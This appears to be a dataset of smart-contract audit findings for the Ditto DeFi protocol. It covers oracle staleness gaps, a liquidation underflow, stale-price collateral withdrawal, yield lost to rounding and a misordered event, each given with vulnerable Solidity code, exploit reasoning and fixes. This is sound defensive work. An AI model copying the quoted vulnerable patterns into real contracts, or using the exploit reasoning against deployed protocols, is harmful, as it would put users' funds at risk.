This would calculate the `m.cRatio` based on the spot price and the `ercDebtAtOraclePrice` based on the cached price.\\nThis is demonstrated in the following example:\\nConsider the following liquidatable short position (simplified; decimal precision is ignored for this demonstration):\\n| Collateral | Debt | Collateralization Ratio (based on spot price) | Price ETH/USD | Spot Price TOKEN/ETH | Cached Price TOKEN/ETH |\\n| --- | --- | --- | --- | --- | --- |\\n| 1 ETH | 1400 TOKEN | $$\\frac{1}{1400 * 0.0005} \\approx 142\\%$$ | 2000 | 0.0005 | 0.00075 |\\nCalculating the `ercDebtAtOraclePrice` with the cached oracle price `0.00075` for TOKEN/ETH, returned by the `LibOracle.getPrice` function, results in:\\n$$ \\begin{align} ercDebtAtOraclePrice &= debt \\cdot price \\\\ &= 1400 \\cdot 0.00075 \\\\ &= 1.05 \\text{ ETH} \\end{align} $$\\nThe resulting debt value, quoted in ETH, is `1.05 ETH`, which is larger than the short's available collateral, `m.short.collateral = 1 ETH`.\\nThis results in an arithmetic underflow error when attempting to subtract the calculated `ercDebtAtOraclePrice` from `m.short.collateral` in line 177.\\nSpecifically, this scenario occurs in the following situation:\\nA user opens a short position with a collateral of $1 \\text{ ETH}$ and a debt of $1400 \\text{ TOKEN}$ at a TOKEN/ETH price of $0.00014286 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.00014286 = 0.2 \\text{ ETH}$ -> CR = $1/0.2 = 500\\%$\\nThe spot (oracle) price of TOKEN/ETH increases from $0.00014286 \\text{ ETH}$ to $0.00075 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.00075 = 1.05 \\text{ ETH}$ -> CR = $1 / 1.05 \\approx 95\\%$ (eligible for secondary liquidation - also for primary liquidation due to < 110%)\\nNew orders for the TOKEN asset are added to the order book, leading to the oracle price being updated/cached to $0.00075 \\text{ ETH}$ per TOKEN\\n~15min after the price got updated and cached, the TOKEN/ETH spot price decreases from $0.00075 \\text{ ETH}$ to $0.0005 \\text{ ETH}$. The CR improves -> CR = $1/(1400 * 0.0005) \\approx 142\\%$\\nSecondary liquidation is attempted to liquidate the short (primary short liquidation is not possible due to the 110% CR limit)\\nDuring the secondary liquidation call, `m.cRatio` is calculated based on the recent spot price (in step 4, due to the cached price being older than 15min) of $0.0005 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.0005 = 0.7 \\text{ ETH}$ -> CR = $1 / 0.7 \\approx 142\\%$\\nIn line 168, `ercDebtAtOraclePrice` is calculated based on the previously cached oracle price of $0.00075 \\text{ ETH}$ -> $1400 * 0.00075 = 1.05 \\text{ ETH}$\\nIn line 176, `ercDebtAtOraclePrice` is subtracted from `m.short.collateral` -> $1 - 1.05 = -0.05 \\text{ ETH}$ -> arithmetic underflow error -> reverts!
Consider also using the minimum of the `m.short.collateral` and `ercDebtAtOraclePrice` values, as similarly done in lines 204-205.
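\\nA sketch of how the cap could look inside `_secondaryLiquidationHelper` (the exact placement relative to the refund logic is a design choice):\\n```\\n     uint88 ercDebtAtOraclePrice =\\n         m.short.ercDebt.mulU88(LibOracle.getPrice(m.asset)); // eth\\n+    // cap the debt value at the short's collateral so the subtraction cannot underflow\\n+    if (ercDebtAtOraclePrice > m.short.collateral) {\\n+        ercDebtAtOraclePrice = m.short.collateral;\\n+    }\\n     m.liquidatorCollateral = ercDebtAtOraclePrice;\\n```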
The secondary short liquidation mechanism reverts in certain market situations, forcing liquidators to wait for the CR to decrease further to be able to use the primary liquidation mechanism. This puts the overall collateral ratio and, thus the asset peg under pressure as liquidations can not be executed in a timely manner.
```\\nfunction getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n return getPrice(asset);\\n } else {\\n return getOraclePrice(asset);\\n }\\n}\\n```\\n
Lack of essential stale check in oracleCircuitBreaker()
medium
The `LibOracle::oracleCircuitBreaker()` lacks checking the condition: "block.timestamp > 2 hours + baseTimeStamp". Hence, the function will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nThis report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the `oracleCircuitBreaker()` only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues.\\nThe `oracleCircuitBreaker()` lacks checking the condition: "block.timestamp > 2 hours + baseTimeStamp" when compared to the `baseOracleCircuitBreaker()`.\\nWithout the check of the condition: "block.timestamp > 2 hours + baseTimeStamp", the `oracleCircuitBreaker()` will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nFor this reason, the `oracleCircuitBreaker()` will not revert the transaction as expected if the `baseChainlinkPrice` is stale.\\n```\\n //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view { //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n || baseChainlinkPrice <= 0; //@audit -- lack the condition: "block.timestamp > 2 hours + baseTimeStamp"\\n\\n if (invalidFetchData) revert Errors.InvalidPrice();\\n }\\n\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp; //@audit -- the baseOracleCircuitBreaker() checks this condition, but the oracleCircuitBreaker() does not check it (for the base oracle (ETH/USD price) only)\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n // rest of code\\n }\\n```\\n\\nThe oracleCircuitBreaker() lacks checking the condition: "block.timestamp > 2 hours + baseTimeStamp": https://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L120-L123\\nWhereas the baseOracleCircuitBreaker() checks that condition: https://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L73
Add the condition: "block.timestamp > 2 hours + baseTimeStamp" in the `oracleCircuitBreaker()` to provide the stale check.\\n```\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n- || baseChainlinkPrice <= 0;\\n+ || baseChainlinkPrice <= 0 || block.timestamp > 2 hours + baseTimeStamp;\\n\\n if (invalidFetchData) revert Errors.InvalidPrice();\\n }\\n```\\n
This report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the `oracleCircuitBreaker()` only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues.\\nThe `oracleCircuitBreaker()` lacks checking the condition: "block.timestamp > 2 hours + baseTimeStamp". Hence, the function will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nConsequently, the `oracleCircuitBreaker()` will not revert the transaction as expected if the `baseChainlinkPrice` is stale. The stale price will be consumed by core functions of the protocol, leading to harming the funds of the protocol and its users.
```\\n //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view { //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n || baseChainlinkPrice <= 0; //@audit -- lack the condition: "block.timestamp > 2 hours + baseTimeStamp"\\n\\n if (invalidFetchData) revert Errors.InvalidPrice();\\n }\\n\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp; //@audit -- the baseOracleCircuitBreaker() checks this condition, but the oracleCircuitBreaker() does not check it (for the base oracle (ETH/USD price) only)\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n // rest of code\\n }\\n```\\n
LibOracle fails to check the fidelity of price data from WETH/USDC pool, which can lead to price manipulation
low
As per the documentation, LibOracle should only return the TWAP price from the WETH/USDC pool if the amount of WETH in the pool is >= 100e18. This ensures the fidelity of the data, reducing the risk of price manipulation. However, this is not properly implemented for the case in which there was an invalid fetch of Chainlink data: LibOracle simply returns the TWAP price without checking whether there's enough liquidity in the pool. This can lead to a lack of data fidelity for the returned price.\\nIt's clear that reverting, rather than returning the TWAP price without checking liquidity, is the correct action: even when there is a valid Chainlink price, if the TWAP price is closer to the cached price and there isn't enough liquidity, the function reverts.\\nLibOracle has a `baseOracleCircuitBreaker` function which decides whether to return the TWAP price or the Chainlink price when the asset is USD. It is defined as follows:\\n```\\nfunction baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n // rest of code\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n }\\n\\n if (invalidFetchData) {\\n return twapPriceInv; // @issue\\n } else {\\n // rest of code\\n }\\n } else {\\n return chainlinkPriceInEth;\\n }\\n}\\n```\\n\\nWhen `invalidFetchData` is true, meaning that the Chainlink price was not properly fetched, it will always return `twapPriceInv`. However, there is no check that at least 100 WETH is in the Uniswap pool, which can result in a lack of data fidelity.
Before returning the TWAP price when `invalidFetchData` is true, first check whether the WETH/USDC pool has enough liquidity.
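\\nA rough sketch of that check in the `invalidFetchData` branch, assuming `Constants.WETH`, `Constants.USDC_WETH`, and an `Errors.InsufficientEthInLiquidityPool` error are available (names illustrative):\\n```\\nif (invalidFetchData) {\\n    // only trust the TWAP when the pool holds enough WETH (>= 100e18 per the docs)\\n    uint256 wethBal = IERC20(Constants.WETH).balanceOf(Constants.USDC_WETH);\\n    if (wethBal < 100 ether) revert Errors.InsufficientEthInLiquidityPool();\\n    return twapPriceInv;\\n} else {\\n    // rest of code\\n}\\n```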
When the chainlink oracle is not functioning correctly, LibOracle will always return the TWAP price for the USD asset. However, this lacks any check as to whether there is enough liquidity in the Uniswap pool to guarantee data fidelity, meaning there is a higher likelihood of price manipulation.
```\\nfunction baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n // rest of code\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n }\\n\\n if (invalidFetchData) {\\n return twapPriceInv; // @issue\\n } else {\\n // rest of code\\n }\\n } else {\\n return chainlinkPriceInEth;\\n }\\n}\\n```\\n
Decreasing and increasing a short's collateral potentially uses an outdated asset price to calculate the collateral ratio
medium
The `decreaseCollateral` and `increaseCollateral` functions in the `ShortRecordFacet` contract calculate the short's collateral ratio based on the cached asset price, which may be outdated, leading to a divergence between the actual collateral ratio (based on the asset spot price) and the calculated collateral ratio.\\nAccording to the conditions for updating the oracle, decreasing the short's collateral via the `ShortRecordFacet.decreaseCollateral` function should update the oracle price if the oracle price is older than 15 minutes.\\nHowever, in the current implementation of the `decreaseCollateral` function, the short's collateral ratio, `cRatio`, is calculated by calling the `getCollateralRatio` function in line 94:\\n```\\nfunction decreaseCollateral(address asset, uint8 id, uint88 amount)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, id)\\n{\\n STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n short.updateErcDebt(asset);\\n if (amount > short.collateral) revert Errors.InsufficientCollateral();\\n short.collateral -= amount;\\n❌ uint256 cRatio = short.getCollateralRatio(asset);\\n if (cRatio < LibAsset.initialMargin(asset)) {\\n revert Errors.CollateralLowerThanMin();\\n }\\n uint256 vault = s.asset[asset].vault;\\n s.vaultUser[vault][msg.sender].ethEscrowed += amount;\\n LibShortRecord.disburseCollateral(\\n asset, msg.sender, amount, short.zethYieldRate, short.updatedAt\\n );\\n emit Events.DecreaseCollateral(asset, msg.sender, id, amount);\\n}\\n```\\n\\nThe called `getCollateralRatio` function uses the `LibOracle.getPrice` function to calculate the collateral ratio:\\n```\\nfunction getCollateralRatio(STypes.ShortRecord memory short, address asset)\\n internal\\n view\\n returns (uint256 cRatio)\\n{\\n return short.collateral.div(short.ercDebt.mul(LibOracle.getPrice(asset)));\\n}\\n```\\n\\nThe `LibOracle.getPrice` function returns the currently cached asset price, which potentially is older than 15 minutes.\\n```\\nfunction getPrice(address asset) internal view returns (uint80 oraclePrice) {\\n AppStorage storage s = appStorage();\\n return uint80(s.bids[asset][Constants.HEAD].ercAmount);\\n}\\n```\\n\\nConsequently, the calculated `cRatio` in line 94 of the `decreaseCollateral` function is based on the potentially outdated asset price, resulting in the collateral ratio being inaccurate and diverging from the actual collateral ratio based on the current asset spot price.\\nA short owner can exploit this by decreasing the short's collateral up to the point where the resulting collateral ratio is equal to the initial margin (i.e., 500%). As the collateral ratio, `cRatio`, is calculated in line 94 based on the outdated cached oracle price, the short owner can withdraw more collateral than the actual collateral ratio (based on the asset spot price) would allow.\\nSimilarly, the `increaseCollateral` function is affected as well.
Consider using the `LibOracle.getSavedOrSpotOraclePrice` function together with the `getCollateralRatioSpotPrice` function to calculate the collateral ratio based on the current asset price.
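\\nA sketch of the change in `decreaseCollateral` (assuming `getCollateralRatioSpotPrice` takes the price as an argument, as its use in the secondary liquidation path suggests):\\n```\\n-    uint256 cRatio = short.getCollateralRatio(asset);\\n+    uint256 cRatio = short.getCollateralRatioSpotPrice(\\n+        LibOracle.getSavedOrSpotOraclePrice(asset)\\n+    );\\n```\\nThe same substitution applies to `increaseCollateral`.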
Short-position owners can withdraw more collateral than eligible, negatively affecting the overall asset's collateral ratio.
```\\nfunction decreaseCollateral(address asset, uint8 id, uint88 amount)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, id)\\n{\\n STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n short.updateErcDebt(asset);\\n if (amount > short.collateral) revert Errors.InsufficientCollateral();\\n short.collateral -= amount;\\n❌ uint256 cRatio = short.getCollateralRatio(asset);\\n if (cRatio < LibAsset.initialMargin(asset)) {\\n revert Errors.CollateralLowerThanMin();\\n }\\n uint256 vault = s.asset[asset].vault;\\n s.vaultUser[vault][msg.sender].ethEscrowed += amount;\\n LibShortRecord.disburseCollateral(\\n asset, msg.sender, amount, short.zethYieldRate, short.updatedAt\\n );\\n emit Events.DecreaseCollateral(asset, msg.sender, id, amount);\\n}\\n```\\n
Loss of ETH yield due to rounding error when updating the yield rate in the `updateYield` function
low
Updating the vault's yield rate in the `LibVault.updateYield` function can lead to a loss of yield if the newly received ETH yield is small due to rounding errors.\\nThe `updateYield` function in the `LibVault` library is called by the permissionless `YieldFacet.updateYield` function and used to update the vault's yield rate from staking rewards earned by bridge contracts holding LSD.\\nThe newly accumulated yield, i.e., ETH received since the last update, is calculated by subtracting the current `zethTotalNew` from the previously stored yield `zethTotal`, as seen in line 75 of the `updateYield` function.\\ncontracts/libraries/LibVault.sol#L92\\n```\\nfunction updateYield(uint256 vault) internal {\\n AppStorage storage s = appStorage();\\n STypes.Vault storage Vault = s.vault[vault];\\n STypes.VaultUser storage TAPP = s.vaultUser[vault][address(this)];\\n // Retrieve vault variables\\n uint88 zethTotalNew = uint88(getZethTotal(vault)); // @dev(safe-cast)\\n uint88 zethTotal = Vault.zethTotal;\\n uint88 zethCollateral = Vault.zethCollateral;\\n uint88 zethTreasury = TAPP.ethEscrowed;\\n // Calculate vault yield and overwrite previous total\\n if (zethTotalNew <= zethTotal) return;\\n uint88 yield = zethTotalNew - zethTotal;\\n Vault.zethTotal = zethTotalNew;\\n // If no short records, yield goes to treasury\\n if (zethCollateral == 0) {\\n TAPP.ethEscrowed += yield;\\n return;\\n }\\n // Assign yield to zethTreasury\\n uint88 zethTreasuryReward = yield.mul(zethTreasury).divU88(zethTotal);\\n yield -= zethTreasuryReward;\\n // Assign tithe of the remaining yield to treasuryF\\n uint88 tithe = yield.mulU88(vault.zethTithePercent());\\n yield -= tithe;\\n // Realize assigned yields\\n TAPP.ethEscrowed += zethTreasuryReward + tithe;\\n❌ Vault.zethYieldRate += yield.divU80(zethCollateral);\\n Vault.zethCollateralReward += yield;\\n}\\n```\\n\\nAfter determining the new `yield` (ETH), a fraction of the `yield` is assigned to the TAPP (treasury). Thereafter, the remaining `yield` is realized by adding it to the vault's `yield` rate (zethYieldRate), which is calculated by dividing the `yield` by the vault's short collateral, `zethCollateral`.\\n[!NOTE] Both the `yield` and `zethCollateral` values are in 18 decimal precision due to tracking ETH balances.\\nBy using the `divU80` function, the `zethYieldRate` is calculated as $zethYieldRate = \\frac{yield \\cdot 10^{18}}{zethCollateral}$\\nHowever, if the numerator is smaller than the denominator, i.e., the received ETH yield is very small and the vault's collateral large enough, the result of the division will be rounded down to 0, leading to a loss of the remaining yield.\\nAs anyone is able to call the public `YieldFacet.updateYield` function, this can be used to maliciously cause a loss of yield for all users if the newly received yield is small.\\nThe following test case demonstrates the described rounding error:\\n
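A self-contained Foundry-style sketch of just the truncating arithmetic (illustrative; it models the `yield * 10^18 / zethCollateral` formula described above rather than driving the full protocol):\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport {Test} from "forge-std/Test.sol";\\n\\ncontract YieldRoundingSketch is Test {\\n    // mirrors the zethYieldRate increase: yield * 1e18 / zethCollateral, truncated\\n    function rateIncrease(uint256 yield, uint256 zethCollateral)\\n        internal\\n        pure\\n        returns (uint256)\\n    {\\n        return (yield * 1 ether) / zethCollateral;\\n    }\\n\\n    function testSmallYieldRoundsToZero() public {\\n        uint256 yield = 999; // 999 wei of newly received yield\\n        uint256 zethCollateral = 10_000 ether; // large vault collateral\\n        // 999 * 1e18 / 1e22 truncates to 0 -> the entire remaining yield is lost\\n        assertEq(rateIncrease(yield, zethCollateral), 0);\\n    }\\n}\\n```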
Consider storing the rounding error and applying the correcting factor (error stored) the next time, or alternatively, prevent (skip) updating the yield if the resulting yield is 0.
Loss of LSD ETH yield for users of the same vault.
```\\nfunction updateYield(uint256 vault) internal {\\n AppStorage storage s = appStorage();\\n STypes.Vault storage Vault = s.vault[vault];\\n STypes.VaultUser storage TAPP = s.vaultUser[vault][address(this)];\\n // Retrieve vault variables\\n uint88 zethTotalNew = uint88(getZethTotal(vault)); // @dev(safe-cast)\\n uint88 zethTotal = Vault.zethTotal;\\n uint88 zethCollateral = Vault.zethCollateral;\\n uint88 zethTreasury = TAPP.ethEscrowed;\\n // Calculate vault yield and overwrite previous total\\n if (zethTotalNew <= zethTotal) return;\\n uint88 yield = zethTotalNew - zethTotal;\\n Vault.zethTotal = zethTotalNew;\\n // If no short records, yield goes to treasury\\n if (zethCollateral == 0) {\\n TAPP.ethEscrowed += yield;\\n return;\\n }\\n // Assign yield to zethTreasury\\n uint88 zethTreasuryReward = yield.mul(zethTreasury).divU88(zethTotal);\\n yield -= zethTreasuryReward;\\n // Assign tithe of the remaining yield to treasuryF\\n uint88 tithe = yield.mulU88(vault.zethTithePercent());\\n yield -= tithe;\\n // Realize assigned yields\\n TAPP.ethEscrowed += zethTreasuryReward + tithe;\\n❌ Vault.zethYieldRate += yield.divU80(zethCollateral);\\n Vault.zethCollateralReward += yield;\\n}\\n```\\n
Use of hardcoded price deviation in baseOracleCircuitBreaker()
low
The `LibOracle::baseOracleCircuitBreaker()` uses a hardcoded value of 50% price deviation, which might be too large when using ETH as the base price reference. Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\nThis report raises an issue regarding the `priceDeviation` variable only, as the `invalidFetchData` (2-hour stale check) was flagged as a known issue.\\nThe `baseOracleCircuitBreaker()` is used for verifying the price reported by Chainlink. If the reported price is invalid or its deviation from the protocol's cached oracle price is more than 50%, the function will fall back to Uniswap's TWAP price instead.\\nHowever, the `baseOracleCircuitBreaker()` uses a hardcoded value of 50% price deviation (0.5 ether), which might be too large when using ETH as the base price reference. Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\n```\\n //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n //@dev if there is issue with chainlink, get twap price. Compare twap and chainlink\\n if (invalidFetchData || priceDeviation) { //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n // rest of code\\n } else {\\n return chainlinkPriceInEth;\\n }\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L77-L78\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L81
The % price deviation should be a variable updatable by the protocol's DAO or admin in production.
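\\nA rough sketch of such a configurable threshold (the storage field, setter name, access modifier, and bounds are all illustrative):\\n```\\nuint256 public priceDeviationThreshold = 0.5 ether; // 50%, current default\\n\\nfunction setPriceDeviationThreshold(uint256 newThreshold) external onlyAdminOrDAO {\\n    // sanity bounds are a design choice\\n    if (newThreshold == 0 || newThreshold > 1 ether) revert Errors.InvalidThreshold();\\n    priceDeviationThreshold = newThreshold;\\n}\\n```\\n`baseOracleCircuitBreaker()` would then compare against `priceDeviationThreshold` instead of the `0.5 ether` literal.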
This report raises an issue regarding the `priceDeviation` variable only, as the `invalidFetchData` (2-hour stale check) was flagged as a known issue.\\nThe use of the hardcoded value of 50% price deviation (0.5 ether) might be too large when using ETH as the base price reference. Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\nConsequently, the check for price deviation in the `baseOracleCircuitBreaker()` might not be effective enough for filtering out stale prices in production, directly affecting the quality of the oracle price that will be consumed by the core functions of the `Ditto` protocol (HIGH impact).
```\\n //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n //@dev if there is issue with chainlink, get twap price. Compare twap and chainlink\\n if (invalidFetchData || priceDeviation) { //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n // rest of code\\n } else {\\n return chainlinkPriceInEth;\\n }\\n }\\n```\\n
Emitting incorrect event value
low
The `LibShortRecord::burnNFT()` emits an incorrect event value.\\nThe `burnNFT()` emits an incorrect event value: `nft.owner`. Specifically, the `nft` variable will point to the storage object specified by the `tokenId`. However, the pointing storage object will be deleted before emitting the `Transfer` event.\\nSubsequently, the `ERC721::Transfer` event will be emitted with `nft.owner` == `address(0)`.\\n```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L366\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L371\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L374
Emit the `Transfer` event before the `delete` operations.\\n```\\n function burnNFT(uint256 tokenId) internal {\\n     //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n     AppStorage storage s = appStorage();\\n     STypes.NFT storage nft = s.nftMapping[tokenId];\\n     if (nft.owner == address(0)) revert Errors.NotMinted();\\n     address asset = s.assetMapping[nft.assetId];\\n     STypes.ShortRecord storage short =\\n         s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n+    emit Events.Transfer(nft.owner, address(0), tokenId);\\n     delete s.nftMapping[tokenId];\\n     delete s.getApproved[tokenId];\\n     delete short.tokenId;\\n-    emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n
The `ERC721::Transfer` is an important event. The incorrect event logs may cause off-chain services to malfunction.
```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n
The same signature can be used with different `distribution` implementations, allowing the caller who owns the signature to distribute on unauthorized implementations
high
